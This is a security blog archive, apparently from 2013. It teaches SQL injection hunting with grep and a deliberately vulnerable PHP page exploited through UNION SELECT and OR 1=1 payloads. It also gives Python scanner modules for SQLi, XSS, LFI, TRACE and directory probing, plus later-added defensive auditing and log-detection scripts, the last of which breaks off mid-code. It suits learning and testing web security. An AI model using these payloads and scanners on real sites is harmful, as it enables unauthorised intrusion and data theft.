A few days ago I found a few bugs in the latest phpBB code.
In short: I need a few servers to test a few cases of a possible exploit.
If you have the latest phpBB installed, or you want to check whether there is a
possibility to build a working exploit, let me know via email.
Saturday, 30 March 2013
Wednesday, 27 March 2013
[EN] IdeAbout SQL Injections
Understanding SQLI. @ 26.03.2013
http://HauntIT.blogspot.com
---------------------------------------------------------------
Why I think it is more important to test for SQLi bugs by reading the code:
once you find the bug in the code, you know exactly where, and with what payload, you need to
inject into the vulnerable place (parameter, cookie, whatever).
Take 'error-based' attacks as an example. Ok, great attack, etc., but what if somewhere (in the
code) there is a 'filter' which blocks all error-generating actions (or the app 'blocks it'
by showing some generic 'error page', or whatever else could be done here to protect the webapp,
or a php.ini setting hides the errors, you name it)?
Another thing about hunting only for error-based SQLi bugs: you can miss something very,
very interesting. :)
Like, of course, other types of SQL injection, or some XSS-based vulnerabilities (like XSS through a
SQL query).
Let's go deeper...
---------------------------------------------------------------
How can we do it?
---------------------------------------------------------------
...and how can we find it in the code. Right.
So. The first example should of course be simple. A 'more advanced' script can be done too if you like.
Think about the possible output of this command:
$ cd your/web/code; grep -n -r -e <soon> ./
Great, we have 'stage 1'.
-n - 'give me the line number'. Very useful.
-r - yes, recursive.
-e 'regexp' - man will help you here.
Run 'man grep'. And check it. Do not read what's next! ;]
Because next we will find a SQL injection vulnerability. And the purpose of this text is:
you must know (and understand) how to find SQLi bugs in your (or your customers') code.
So, if you have already read the man page for grep, we can go deeper again...
---------------------------------------------------------------
What can we do now.
---------------------------------------------------------------
And how. ;)
Good exercise! Go to wordpress.org and find (I mean download) a few sample plugins.
This is very good practice for learning how SQLi bugs can be found.
Another good idea is below. (But if you chose to try the downloaded WP plugins, go to the unpacked
plugins directory now.)
(We must search the entire code, but for now we can use grep without '-r', so
we search only the current directory. It is the 'longer way', but we are learning
right now, remember? ;))
Ok: grep, and grep again. Maybe something else to use now?
Right, try 'man egrep' ;]
$ egrep -n -e "SELECT|INSERT" *.php | grep DESC | grep -e "\\$"
What is good to remember:
- if you're using egrep with "something|else" to search for SQL injections, it can be useful
to search like this: egrep -n -r -e "select |insert " <- check it twice: there is a ' ' (space) between
the SQL word (select) and the |, so the bare keyword is matched and not, say, 'selected'.
Ok, now it could be used like this:
$ egrep -n -r -e "SELECT | INSERT | (other sql command you want here)" ./ | grep "DESC" (just an example, of course*) | grep -e "\\$"
which will give you:
- parameters ($...),
- queries with 'DESC' (but be careful here: once upon a time I found that searching for this command (DESC) echoed 'other' output (strings) than 'ASC' did (for ASC there was no output at all). So think about what you're looking for, because you will get exactly what you asked for. ;))
- and of course the SQL command you wanted.
A very useful command was used in 'SQL Injection Attack and Defence' by Justin Clarke from 'Syngress':
If you are looking for a good book about SQL injection ('attack and defence' ;) )...
Buy it! ;]
(with some small modifications by me ;) we have a grep 'one-liner'; note the pattern is in single quotes, otherwise the shell expands $_ before grep ever sees it)
$ grep -n -r '\(select \|insert \|update \|where \|order by \)\(.*$_\(GET\|POST\|HTTP_\).*\)' ./ | awk -F : '{print "filename: "$1"\nline: "$2"\nmatch: "$3"\n------next is:--------\n"}'
(Remember that in this example we are looking for vulnerabilities in a PHP-based webapp. So add another bash command here to 'extract' only the data that interests us (without checking for SQL commands in files like TXT, for example).)
$ grep -n -r '\(select \|insert \|update \|where \|order by \)\(.*$_\(GET\|POST\|HTTP_\).*\)' ./ | grep -e "\.php" | awk -F : '{print "filename: "$1"\nline: "$2"\nmatch: "$3"\n------next is:--------\n"}'
Disappointed? ;]
Try this one:
$ grep -n -r "\(select \|insert \|update \|where \|order by \)" ./ | grep -e "\.php" | awk -F : '{print "filename: "$1"\nline: "$2"\nmatch: "$3"\n------next is:--------\n"}'
Still could be 'bad'. :C
Maybe this one:
$ grep -n -r "\(select \|insert \|update \|where \|order by \)" ./ | grep -e "\.php" | grep -e "\\$" | awk -F : '{print "filename: "$1"\nline: "$2"\nmatch: "$3"\n------next is:--------\n"}'
Yes, it's about giving grep another, and another... value to search for...
We could do this for a week. :) But that is too long.
So maybe now we should 'switch places' with the programmer/coder/developer.
Where (as a programmer) will you have to use SQL?
A few examples:
- registering users
- mail to them (via a form/contact page, if there is one at your site)
- forum/blog/board/guest book
- search (if page is generated by content from db)
- forgotten-password mechanism
- and so on...
Stop here, and think about it another way. Where else can SQLi be found?
If 'this webapp is so big', you (as the programmer) will (? ;)) have to use some,
let's say, 'catalog' to store (and include or reuse later) your filtering
functions, DB functions and other functions... Like a 'lib' directory.
So 'ls -la', and look for the (typical) include or lib or library directory, and so on.
(That's why an attacker who wants to hack your page will do a file/directory-searching attack
to find out whether there is any 'interesting' directory (or file, like 'admin.php.back', etc.) on your web server.)
Ok. Let's get back to our searching 'via e/grep'.
What each file is used for can usually be guessed just by reading the names. ;)
For example (a typical ls -la ./webapp/) we'll have something like:
$/phpBB3/includes$ ls ../
adm config.php download files index.php memberlist.php report.php style.php viewforum.php web.config
cache cron.php faq.php images language output.txt search.php styles viewonline.php
common.php docs feed.php includes mcp.php posting.php store ucp.php viewtopic.php
$
or something similar.
What we can pick first (to search for vulns soon) are files like:
config.php, mcp.php, search.php, viewtopic.php, etc., etc...
So now we should use our grep to search only in this directory (./):
$ grep -n "\(select \|insert \|update \|where \|order by \)" *.php | grep -e "\.php" | grep -e "\\$" | awk -F : '{print "filename: "$1"\nline: "$2"\nmatch: "$3"\n------next is:--------\n"}'
Nice. (Save it to >output.txt for now.)
Now you have an idea of what to search for and how to start looking for SQL injection bugs.
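As an added example (not from the original post), here is the same audit as a small Python 3 script instead of a grep/awk pipeline: it scans PHP sources for SQL keywords, rates lines that also contain a request superglobal as high, and lines that only interpolate a variable into the query string as medium, which is exactly the case the one-liner above misses when $_GET is read on a separate line. The sample tree is constructed inline; the regexes and the superglobal list are my own, not the book's or the post's.

```python
"""Static audit for SQL built from request input, mirroring the grep pipeline.

Added example, not the post's own code.  The source tree is passed in as a
{path: source} mapping so the script runs offline on the constructed sample.
"""
import re

# SQL keyword followed by a space: the post's trick to skip words like 'selected'.
SQL_KEYWORD = re.compile(r"\b(select|insert|update|delete|where|order by) ", re.IGNORECASE)
# PHP superglobals that carry request input (my list, broader than the one-liner's).
TAINT_SOURCE = re.compile(r"\$_(GET|POST|REQUEST|COOKIE|SERVER|FILES)\b")
# A PHP variable interpolated into a double-quoted string, e.g. "... where id=$id".
INTERPOLATED = re.compile(r'"[^"\n]*\$[A-Za-z_]\w*[^"\n]*"')


def audit_php_sources(sources):
    """Return findings as (path, line_no, severity, line) tuples.

    'high'   : SQL keyword and a superglobal on the same line
    'medium' : SQL keyword with a variable interpolated into the query string
    Only *.php files are scanned, like the `grep -e "\\.php"` stage above.
    """
    findings = []
    for path in sorted(sources):
        if not path.endswith(".php"):
            continue
        for no, line in enumerate(sources[path].splitlines(), start=1):
            if not SQL_KEYWORD.search(line):
                continue
            if TAINT_SOURCE.search(line):
                findings.append((path, no, "high", line.strip()))
            elif INTERPOLATED.search(line):
                findings.append((path, no, "medium", line.strip()))
    return findings


def format_findings(findings):
    """Render findings the way the post's awk one-liner does."""
    out = []
    for path, no, severity, line in findings:
        out.append("filename: %s\nline: %d\nseverity: %s\nmatch: %s\n------next is:--------"
                   % (path, no, severity, line))
    return "\n".join(out)


# Constructed sample tree: the post's page.php lines plus two decoys.
SAMPLE_TREE = {
    "page.php": """<?php
$id = $_GET['id']; // 1
$query = "SELECT * from students where id=$id"; // 2
$response = mysql_query($query);
""",
    "search.php": """<?php
$q = mysql_query("SELECT * FROM posts WHERE title LIKE '%" . $_POST['q'] . "%'");
$stmt = $pdo->prepare('SELECT * FROM posts WHERE id = ?');
""",
    # not a .php file, so it is skipped even though it looks tainted
    "notes.txt": "select * from students where id=$_GET['id'] -- docs only\n",
}

if __name__ == "__main__":
    print(format_findings(audit_php_sources(SAMPLE_TREE)))
```

The prepared-statement line in search.php produces no finding, which is the shape the flagged lines should be rewritten into.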
---------------------------------------------------------------
Example from a course on 'how to make your page with mysql'
---------------------------------------------------------------
We will stop at this point to learn how a web application is built
with SQL commands: how it can be done, how the SQL queries are created.
We will now use a simple example: a page where the 'id' parameter refers to a
user (a student, let's say). If the visitor sends (via HTTP GET) a value
for the 'id' parameter, the page goes 'directly to the DB' to check whether there is
something (a row in the students table) with value '1' for the 'id' column.
---------------------------------------------------------------
How it looks (from the code's point of view):
---------------------------------------------------------------
First of all we must create a page which uses SQL:
To do that, we need a 'sample database' for our page to get its content from.
To create our database we need to connect to our SQL server:
$ mysql -u root -p
mysql> create database school; use school;
Your database should look like this:
mysql> describe students;
+---------+-----------------+------+-----+---------+----------------+
| Field   | Type            | Null | Key | Default | Extra          |
+---------+-----------------+------+-----+---------+----------------+
| id      | int(5) unsigned | NO   | PRI | NULL    | auto_increment |
| name    | varchar(20)     | YES  |     | NULL    |                |
| surname | varchar(100)    | YES  |     | NULL    |                |
+---------+-----------------+------+-----+---------+----------------+
Ok, if you have it, now we can write a simple page that GETs information about
an 'id' (of the student we want to check).
--page.php--
<html>
<title>our learning system</title>
<body>
<?php
if(!mysql_connect('localhost','youruser','yourpass')){
    echo 'can not connect to DB :C';
    exit(0);
}
if(!mysql_select_db('school')){
    echo 'can not use selected database';
    exit(0);
}
$id = $_GET['id']; // 1 - taken straight from the request, no validation
$query = "SELECT * from students where id=$id"; // 2 - interpolated into the SQL string as-is
$response = mysql_query($query);
echo '<p><br>';
echo '<table border="1"><tr>';
echo '<td><strong>id</strong></td>';
echo '<td><strong>name</strong></td>';
echo '<td><strong>surname</strong></td></tr>';
while($row = mysql_fetch_row($response)){
    echo '<tr>';
    echo '<td>'.$row[0].'</td>';
    echo '<td>'.$row[1].'</td>';
    echo '<td>'.$row[2].'</td>';
    echo '</tr>';
}
echo '</table>';
if(!mysql_close()){
    echo 'can not close db connection :C<br>';
    exit(0);
}
?>
</body>
</html>
--page.php--
As we can see, our page.php gets the 'id' value from a simple GET.
(Tip: if you're testing for SQL injection vulnerabilities on your own server, you can use
one interesting command to debug a little and find more precisely where we can try to
exploit a possibly vulnerable piece of code. Try this:
root@box:~# tail -n 1 -f /var/log/mysql.log
This command will print out the SQL queries as the server receives them (the MySQL general query log has to be enabled for this).)
For example:
(In the Linux console we have tail -n 1... running, and in the browser we have the full address of our page.php.)
Try this: http://localhost/page.php?id=1
The output of the 'tail' command is probably something like this:
(...)
root@box:~# tail -n 1 -f /var/log/mysql/mysql.log
169 Quit
130327 11:44:16 170 Connect tester@localhost on
170 Init DB school
170 Query SELECT * from students where id=2
170 Quit
(...)
Great. Let's look at what happens on our page if we do not add any id value:
http://localhost/page.php?id=    (nothing here, press enter)
(...)
130327 11:54:55 171 Connect root@localhost on
171 Init DB school
171 Query SELECT * from students where id=
171 Quit
(...)
Ok, let's add a simple 'wrong query'; this could be used here: %^&*(*&^Y}:":>')
http://localhost/page.php?id=%^&*(*&^Y}:":>')
Response from mysql.log:
172 Query SELECT * from students where id=%^
Ok, so the & cut off our string (in a URL the & starts the next parameter). Let's try without this character:
173 Query SELECT * from students where id=%^*(*^Y}:":>')
Great. Let's go back to the directory with the page.php file and type our 'grep' command there:
$ grep -n "\(select \|insert \|update \|where \|order by \)" *.php | grep -e "\.php" | grep -e "\\$" | awk -F : '{print "filename: "$1"\nline: "$2"\nmatch: "$3"\n------next is:--------\n"}'
filename: page.php
line: 20
match: $zapytanie = "SELECT * from students where id=$id";
------next is:--------
Ok. So because there is no filtering here (//2), and (cat page.php) no filtering
when the 'id' parameter is taken from GET (//1), we can try to add some
SQL commands/queries here:
id=1' and select version(); --
The answer (tail) is:
174 Query SELECT * from students where id=1' and select version(); --
Let's try without the '. Still nothing. So maybe we should combine this (//1) SELECT
with another SELECT? Or maybe with OR?
Let's try it out:
183 Query SELECT * from students where id=1 OR 1=1
Great, we have all the students listed on the output page(.php).
I think you have already heard about UNION SELECT.
Let's check whether this vulnerable page.php can be exploited by sending a UNION
to the 'id' parameter:
If your webapp/webserver is secured somehow, connect directly to your MySQL console.
Try to do the same as the code in page.php does, so:
SELECT * from students WHERE id=1
Now 'mix' this SQL query with UNION:
ERROR 1222 (21000): The used SELECT statements have a different number of columns
mysql> select * from students where id=1 UNION SELECT version(),2;
ERROR 1222 (21000): The used SELECT statements have a different number of columns
mysql> select * from students where id=1 UNION SELECT version(),2,3;
+-----------------------------+-------+----------+
| id                          | name  | surname  |
+-----------------------------+-------+----------+
| 1                           | wacek | kapusta  |
| 5.5.29-0ubuntu0.12.04.1-log | 2     | 3        |
+-----------------------------+-------+----------+
2 rows in set (0.00 sec)
That's it. We have a working exploit for the SQL injection vulnerability:
http://localhost/page.php?id=1 UNION SELECT version(),2,3;
or of course:
http://localhost/page.php?id=1 UNION SELECT version(),user(),database();
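As an added example (not from the original post), a Python 3 detector that runs over the mysql.log excerpts shown above and flags every Query line whose 'id' value is not a plain integer. It assumes the general-log line shape shown above (connection id, command, statement, with an optional leading timestamp) and that page.php only ever issues SELECT * from students where id=<integer>; the UNION log line and the connection id 184 are constructed.

```python
"""Flag injection attempts in the MySQL general log used in the post.

Added example, not the post's code.  Assumes the log lines look like
`<conn_id> Query <sql>` and that the only legitimate statement is
`SELECT * from students where id=<integer>`.
"""
import re

# optional "YYMMDD HH:MM:SS", then connection id, command word, rest of line
LOG_LINE = re.compile(r"^(?:\d{6}\s+\d{2}:\d{2}:\d{2}\s+)?(\d+)\s+(\w+)\s*(.*)$")
# the one statement page.php is supposed to send; everything after id= is the user value
EXPECTED = re.compile(r"^SELECT \* from students where id=(.*)$", re.IGNORECASE)
INTEGER = re.compile(r"^-?\d+$")
# tokens that never belong in an integer id: quotes, comment markers, boolean/union glue
SUSPICIOUS = re.compile(r"""(['"#;]|--|/\*|\b(or|and|union|select)\b)""", re.IGNORECASE)


def classify_id_value(value):
    """Return None for a benign integer id, otherwise a short reason string."""
    value = value.strip()
    if value == "":
        return "empty id (parameter missing)"
    if INTEGER.match(value):
        return None
    if SUSPICIOUS.search(value):
        return "sql syntax in id: %s" % value
    return "non-numeric id: %s" % value


def scan_general_log(lines):
    """Return (connection_id, reason, sql) for every suspicious Query line."""
    alerts = []
    for raw in lines:
        m = LOG_LINE.match(raw.strip())
        if not m or m.group(2) != "Query":
            continue  # Connect / Init DB / Quit lines carry no statement
        conn_id, sql = m.group(1), m.group(3)
        q = EXPECTED.match(sql)
        if not q:
            alerts.append((conn_id, "unexpected statement shape", sql))
            continue
        reason = classify_id_value(q.group(1))
        if reason:
            alerts.append((conn_id, reason, sql))
    return alerts


# Constructed sample: the log excerpts shown in the post, in order, plus one
# constructed line (conn 184) for the UNION request the post sends last.
SAMPLE_LOG = """\
130327 11:44:16 170 Connect tester@localhost on
170 Init DB school
170 Query SELECT * from students where id=2
170 Quit
171 Query SELECT * from students where id=
172 Query SELECT * from students where id=%^
174 Query SELECT * from students where id=1' and select version(); --
183 Query SELECT * from students where id=1 OR 1=1
184 Query SELECT * from students where id=1 UNION SELECT version(),user(),database()
""".splitlines()

if __name__ == "__main__":
    for conn_id, reason, sql in scan_general_log(SAMPLE_LOG):
        print("conn %s: %s\n    %s" % (conn_id, reason, sql))
```

The same integer check, applied to $_GET['id'] in page.php before the query is built (or a prepared statement with a bound parameter), is what closes the hole the post demonstrates.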
Now you can get back to checking phpBB :)
Good luck and have fun!
---
To be continued...
http://HauntIT.blogspot.com
Monday, 25 March 2013
[EN] Exploit for latest SMF 2.0.4
Hi.
This week I will publish some new information about vulnerabilities I found.
For example, full technical details about the vulnerable (latest) version of SMF 2.0.4 will be available after contacting the vendor.
*update:*
I see that in some cases there is a possibility to drop a (web)shell via a CSRF attack.
The post will be updated, so...
See you soon! ;)
Wednesday, 20 March 2013
[EN] Modules in your own webscanner - few OPTIONS
Below we have 2 scripts.
The first gets all HTTP OPTIONS (if possible).
The second tries to send TRACE (which could be used for XST vulnerabilities).
Here we go:
#!/usr/bin/env python
# try_options.py
#
# Python 2 (httplib). Usage: try_options.py host[:port]
import httplib
import sys

url = sys.argv[1]
conn = httplib.HTTPConnection(url)
conn.request('OPTIONS', '/')          # ask the server which methods it allows
resp = conn.getresponse()
page_response = resp.read()
#print page_response
print resp.status, resp.reason
full_answer = resp.getheaders()       # list of (header, value) tuples; look for 'allow'
#print 'What we have here:\n', full_answer
print '-----------------------------------------------'
i = 0
while i < len(full_answer):
    print ' -> '.join(full_answer[i])
    i = i + 1
(The code is on pastebin too.)
The next stage is to check whether we can use TRACE (if the previous test shows this method as available):
#!/usr/bin/env python
# try_trace.py
# more at http://hauntit.blogspot.com
#
# Python 2 (httplib). Usage: try_trace.py host[:port]
import httplib
import sys

url = sys.argv[1]
conn = httplib.HTTPConnection(url)
#conn.request('TRACE','/w0rkin')
conn.request('TRACE', '/<script>alert(/w0rkin/)</script>')   # TRACE echoes the request back
resp = conn.getresponse()
page_response = resp.read()
#print page_response
print
print 'try TRACE for: ', url
print 'Status: ', resp.status, resp.reason
full_answer = resp.getheaders()
print '\nWhat we have here:\n'#, full_answer
print '-----------------------------------------------'
i = 0
if resp.status == 200:
    while i < len(full_answer):
        print ' with value: '.join(full_answer[i])
        i = i + 1
    print '-----------------------------------------------'
    print 'Response:\n', page_response   # our marker echoed back means TRACE is enabled (XST)
else:
    print 'No TRACE, or other problem :C' # try manually or add debug here
(and the pastebin version).
Enjoy ;)
[EN] Modules in your own webscanner - SQL injection module
Here I will present a simple idea of how to find out whether your site is vulnerable to SQL injection.
This code works on POST requests (the idea is taken from the XSS-via-POST module).
The code was released because during a few tests I found a 0day vulnerability (SQL injection) in one of Joomla's modules (I won't tell you which one ;) try it yourself!)
The code is here:
#!/usr/bin/env python
# try_POST_sqli.py
#
# first we will GET argv[1]/page.argv[2] to read it
# and find out what names/inputs/submits/etc... there are.
# next we will POST those param-names separately with 'payload'.
#
# enjoy.
import urllib
import re
import sys
import httplib

# the usage check has to run before sys.argv[1] and sys.argv[2] are touched
if len(sys.argv) < 3:
    sys.stderr.write('usage: ' + sys.argv[0] + ' localhost /path/2file.php\n')
    sys.exit(1)

host = sys.argv[1]
path_file = sys.argv[2]
url = host + ':80'
url_file = url + path_file
payload = '\';]SQLI?^&*(O:UI:Y@:>T^#/**'
print 'Target: ', host
print 'Vuln file: ', path_file
print 'Full URL to attack:', url_file
print

# first we must GET page, to read whole text to find
# if there is any of our 'vulnerable' (to test) string.
get_connect = urllib.urlopen('http://' + url_file)
get_response = get_connect.read()
status = get_connect.getcode()
print 'Status of requested page: ', status

# what we're looking for: every name="..." attribute (form field names)
#results = re.findall("<(input|textarea|select).+?name=['\"].(.+?)['\"].*?>",get_response)
results = re.findall(" name=\"([^\"]+)\"", get_response)

#############################################################
# hm ;] one idea to test right now. ;D
poc = open('log_file_with_sql_output.txt', 'w')
#############################################################

# func to send POST to target url with one found parameter set to the payload
def do_post_now(url, param):
    params = urllib.urlencode({param: payload})
    headers = {'Content-type': 'application/x-www-form-urlencoded', 'Accept': 'text/plain'}
    connect = httplib.HTTPConnection(url)
    connect.request('POST', path_file, params, headers)
    response = connect.getresponse()
    print response.status, response.reason # 200 OK?
    data = response.read()
    connect.close() # end of test this parameter at this URL
    offset = data.find('MySQL')  # a MySQL error text in the response hints at error-based sqli
    if offset != -1:
        print '\t[+- ( POST SQLI alert! ) -+]'
        print '\t [+] Found sqli marker at offset:', offset, 'for param:', param
        poc.write(data)  # write&save simple p0c file. ;7
# end of do_post_now(url, param)

# ---
# MAIN:
# if result found:
if len(results) > 0:
    print '-------------------------------------------------------------'
    print 'Got some results :) Now we can try to exploit parameters.\n'
    i = 0 # next in list
    while i < len(results):
        print 'Found param called: ', results[i]
        print 'Do POST now, for URL: ', url, ' with param: ', results[i]
        do_post_now(url, results[i])
        # end of this POST for this parameter
        # and next line:
        i = i + 1
    # end of while i loop
poc.close()
You can also find this code at pastebin.
Let me know if you have any questions. ;)
Cheers o/
[EN] Modules in your own webscanner - LFI module
The code listed below is a simple LFI checker. It's based on the same module as XSS-over-POST.
As I wrote before, all of these 'modules' can be rewritten as one bigger program.
Here is the code:
#!/usr/bin/env python
# ----
# try_lfi.py - simple find if there is LFI vulnerability
# ----
# - can be also used to find traversal-vulnerabilities
# - tests can be extended to find more information than just passwd file.
import urllib
import sys

if len(sys.argv) < 2:  # check the arguments before using them
    sys.stderr.write('usage: ' + sys.argv[0] + ' http://localhost/page?param=\n')
    sys.exit(1)

# defines:
url = sys.argv[1]
checkLfis = open('LFItext.txt', 'r')
# strip the newline from every line, otherwise it ends up inside the URL
try_lfi = [line.strip() for line in checkLfis.readlines() if line.strip()]
checkLfis.close()

print '---------------------------------------------------------------'
print '[+] Searching for traversal/LFI vulnerability at URL: ', url
print '---------------------------------------------------------------'
for line in try_lfi:
    full_url_to_check = url + line
    try_page = urllib.urlopen(full_url_to_check)
    read_page = try_page.readlines()
    print 'Trying: ', line
    print 'Status: ', try_page.getcode()
    print '\t[~] Now reading the answer to find out if there is our \'vulnerable-string\'...'
    for read_lines in read_page:
        if read_lines.find('root') != -1:
            print '\t[+] Found potential LFI bug! '
            print 'This is the answer: ', read_lines.rstrip()
    print '---------------------------------------------------------------'
As you can read in this code, it uses an LFItext.txt file with the various strings to try, one per line.
In the module's source you will find how to use it against local-file-include vulnerabilities.
The whole code is also available at pastebin.
Feedback is welcome ;)
Enjoy! o/
[EN] Modules in your own webscanner - XSS over POST
This is another example of how Python can be used to build a (maybe simple, but) useful
webapp scanner. This part (called a 'module') can be used to figure out where in the tested page we
will have a possibility of an XSS vulnerability (via HTTP POST).
It could be a good exercise to connect all of these 'modules' into 'one code'
to test all vulnerabilities.
To start, create a file named try_POST_xss.py. (Like before, we will need chmod u+x for this file.)
The source code you can find below:
#!/usr/bin/env python
# ----
# try_POST_xss.py
# ----
# first we will GET argv[1]/page.argv[2] to read it
# and find out what names/inputs/submits/etc... there are.
# next we will POST those param-names separately with 'payload'.
# enjoy.
import urllib
import re
import sys
import httplib

if len(sys.argv) < 3:  # we need both the host and the path, so check before using them
    sys.stderr.write('usage: ' + sys.argv[0] + ' localhost /path/2file.php\n')
    sys.exit(1)

host = sys.argv[1]
path_file = sys.argv[2]
url = host + ':80'
url_file = url + path_file
payload = 'your<xss<code<here'  # for example script+alert(2222) - see below ;)
marker = '2222'  # the part of the payload we expect to see reflected in the response
# if you want I have version 'payloads-from-file' too.
print 'Target: ', host
print 'Vuln file: ', path_file
print 'Full URL to attack:', url_file
print

# first we must GET page, to read whole text to find
# if there is any of our 'vulnerable' ('to find') string.
get_connect = urllib.urlopen('http://' + url_file)
get_response = get_connect.read()
status = get_connect.getcode()
print 'Status of requested page: ', status

# what we're looking for: the name="..." attribute of every form field
#results = re.findall("<(input|textarea|select).+?name=['\"].(.+?)['\"].*?>",get_response)
results = re.findall(' name="([^"]+)"', get_response)

#############################################################
# hm ;] one idea to test right now. ;D
poc = open('poc_file_for_POST_xss.html', 'w')  # simple p0c file with the reflecting responses
#############################################################

# func to send POST (payload in one found parameter) to target url
def do_post_now(url, param):
    params = urllib.urlencode({param: payload})
    headers = {'Content-type': 'application/x-www-form-urlencoded', 'Accept': 'text/plain'}
    connect = httplib.HTTPConnection(url)
    connect.request('POST', path_file, params, headers)
    response = connect.getresponse()
    print response.status, response.reason  # 200 OK?
    data = response.read()
    connect.close()  # end of test this parameter at this URL
    pos = data.find(marker)
    if pos != -1:
        # find() returns a character offset; count the newlines before it for the line number
        line_no = data.count('\n', 0, pos) + 1
        print '\t[+- ( POST XSS alert! ) -+]'
        print '\t [+] Found POST XSS in line:', line_no
        print data.splitlines()[line_no - 1]
        poc.write('<!-- param: ' + param + ' -->\n')
        poc.write(data)
# end of do_post_now(url, param)

# ---
# MAIN:
# if result found:
if len(results) > 0:
    print '-------------------------------------------------------------'
    print 'Got some results :) Now we can try to exploit parameters.\n'
    for param in results:
        print 'Found param called: ', param
        print 'Do POST now, for URL: ', url, ' with param: ', param
        # here we'll create a POST for found parameter
        do_post_now(url, param)
        # end of this POST for this parameter
# end of the loop over found parameters
# poc.close() used to sit inside do_post_now() and raised an error from the second
# parameter on (the file was already closed); closing it once, here, avoids that.
poc.close()
# EOF.
# ----
An interesting thing here is that you will find 0day vulnerabilities at big companies.
Trust me. ;)
And - as always - feedback is welcome.
(* full code you will find also here.)
Enjoy! ;)
[EN] Modules in your own webscanner - find dirs and files
During projects the question often is 'what tools do we use'.
It would be difficult to 'present' the entire list of tools available in distros such as BackTrack,
but sometimes it is also hard to believe that we can use 'our own tools'.
Today, the idea is taken directly from the popular DirBuster (available here). If you don't know it,
take a few minutes to check it out against your server(s).
Sometimes, when we're doing tests 'from shell' (or from console, you name it), we would like to use a 'lighter' tool than the Java-based DirBuster.
Python can be the answer here.
With a few lines of code, we can offer a simple solution. A small program written in Python
reads 'line by line' the filenames and/or dir-names listed in a TXT list file, and after that it
will present the status code (of the HTTP response) for each file/dirname.
In the directory where you'll put this Python code, let's create the file with a list of the interesting location(s) on a remote server. A sample list could look like this:
/config.php
/config_inc.php
/config/
/configuration/
/configuration.php
/doc/
/api/
/cache/
/template/
/language/
/media/
/modules/
/plugins/
/install/
/users/
/admincp/
/modcp/
/archive/
/archives/
/sitemap.xml
/ckeditor.php
/FCKeditor/editor/filemanager/browser/default/browser.html
/editor/filemanager/browser/default/browser.html
/fckeditor/editor/css/
/wp-admin/
/wp-content/
/wp-includes/
/index.aspx
/manual/
/server-status
/phpinfo.php
/pi.php
/phpMyAdmin/
/phpmyadmin/
/pma/
/panel/
/login/
/register
/contac
Of course a good choice is to use your own list (but for a start you can try the 'lists' from DirBuster / the fuzzdb project).
Save this list to the 'dirsToCheck.txt' file. This is of course a sample list of locations 'most interesting (to us)' on a remote test server. Finding those files/dirs can be significant (from a 'webapp-test point of view') because they could be abused later, or give information that will be useful during the next steps of a pentest.
How do I take advantage of it now?
The program, which is below, does the following:
* reads the previously prepared TXT file (with names and locations of directories and files) line by line, one 'name-location' per line
* uses those 'names' (locations) to build a full URL for the remote host (given as sys.argv[1])
* checks each full URL with an HTTP GET (via urllib)
* reports the status code (of the HTTP response) as the answer for each test (for each 'location')
Code is here:
#!/usr/bin/env python
# ---
# try_dirs.py
# this 'module' will check if there is a file/dir at remote host.
# files/dirs can be edited (you will find it at dirsToCheck.txt file).
# ---
# version : 2 @ 19.03.2013
#
import urllib
import sys

if len(sys.argv) < 2:  # check the arguments before using them
    sys.stderr.write('usage: ' + sys.argv[0] + ' http://localhost/\n')
    sys.exit(1)

# defines:
url = sys.argv[1].rstrip('/')  # every list entry starts with '/', so avoid a double slash
dirsToCheck = open('dirsToCheck.txt', 'r')
# strip the newline from every line, otherwise it ends up inside the URL
try_dir = [line.strip() for line in dirsToCheck.readlines() if line.strip()]
dirsToCheck.close()

print '--------------------------------------------------------------'
print 'Try enumerate files/dirs at this URL: ', url
print '--------------------------------------------------------------'
for line in try_dir:
    full_url_to_check = url + line
    # print full_url_to_check
    try:
        try_page = urllib.urlopen(full_url_to_check)
    except IOError as err:  # connection refused, DNS failure, timeout...
        print 'Could not fetch: ', line, '-', err
        continue
    code = try_page.getcode()
    if code == 200:
        print 'Found location: ', line
        print 'Status: ', code
        print '------------------------------------------'
    elif code == 401:
        print 'Found location: ', line
        print 'Seems to be authorized only: ', code
        print '------------------------------------------'
    elif code >= 500:
        print 'Found server-side problem: ', line
        print 'Status: ', code
        print '------------------------------------------'
    elif code == 403:
        print 'Found but you have no permissions to access: ', line
        print 'Status: ', code
        print '------------------------------------------'
Now you can re-edit this code to add, for example, the 404 code (which can be useful during the information-gathering steps, because sometimes 404 pages respond with the accurate server name and version).
At this stage, all the results of the program can be written out with the *nix 'redirect to a file', using '> name.txt'.
Another method is to create a larger 'program' and establish methods of saving to a 'log file' (e.g. using writelines() to generate a simple report in a more elegant way).
How to run it you will find in the code. At the console you can use
$ chmod u+x check_dirs.py
and next:
$ ./check_dirs.py http://our-server.com (with > filelog.txt if you want)
Sample output will look like this:
$ ./check_dirs-2.py http://www.xxx.xx
--------------------------------------------------------------
Try enumerate files/dirs at this URL: http://www.xxx.xx
--------------------------------------------------------------
Found location: /plugins/
Status: 200
------------------------------------------
Found location: /sitemap.xml
Status: 200
------------------------------------------
Found but you have no permissions to access: /wp-admin/
Status: 403
------------------------------------------
Found location: /wp-content/
Status: 200
------------------------------------------
Found but you have no permissions to access: /server-status
Status: 403
------------------------------------------
(...)
(* full code you will find here.)
Enjoy ;)
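Seen from the server side, the modules in this and the earlier posts (dir-finder, LFI checker, SQLi module) leave recognisable traces in the web server's access log. As an added example (Python 3, not code from the original posts), the script below parses combined-format access-log lines and flags a burst of 403/404 misses from one client, hits on the sensitive locations from the dirsToCheck.txt sample list, traversal sequences in the request target, and a quote followed by a comment opener in the query string; the log lines, client addresses and the 'Python-urllib/1.17' User-Agent string are constructed for the example, and the thresholds (8 misses in 60 s, 3 sensitive paths) are assumptions to tune per site.

```python
#!/usr/bin/env python3
# detect_scanner_probes.py  (added example; not code from the original posts)
# Flags, in Apache/nginx "combined" access-log lines, the footprints that the
# dir-finder, LFI and SQLi modules above leave: a burst of 403/404 misses from one
# client, hits on the sensitive locations of the dirsToCheck.txt sample list,
# traversal sequences in the request target, and a quote followed by a comment
# opener in the query string. POST bodies never reach the access log, so the
# POSTed SQLi payload itself is not visible here. All log lines are constructed.
import re
from collections import Counter, defaultdict
from datetime import datetime
from urllib.parse import unquote

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')
# Locations taken from the post's dirsToCheck.txt sample list.
SENSITIVE_PATHS = {'/phpMyAdmin/', '/phpmyadmin/', '/pma/', '/server-status',
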